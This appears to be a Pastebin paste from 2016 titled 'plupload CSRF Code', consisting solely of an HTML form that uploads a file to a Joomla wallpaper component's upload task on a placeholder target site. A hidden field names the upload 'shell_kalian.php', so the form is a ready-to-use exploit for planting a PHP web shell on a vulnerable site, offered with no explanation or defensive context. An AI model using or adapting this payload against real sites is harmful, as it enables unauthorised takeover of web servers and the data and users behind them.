Advertisement
AgusSR

plupload CSRF Code

Jul 31st, 2016
3,610
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.30 KB | None | 0 0
  1. <html>
  2. <body>
  3. <form method="post" action="http://www.target.com/index.php?option=com_jwallpapers&task=upload" enctype="multipart/form-data">
  4. <input type="file" name="file"/>
  5. <input type="hidden" name="name" value="shell_kalian.php" />
  6. <input type="submit" value="submit"/>
  7. </form>
  8. </body>
  9. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement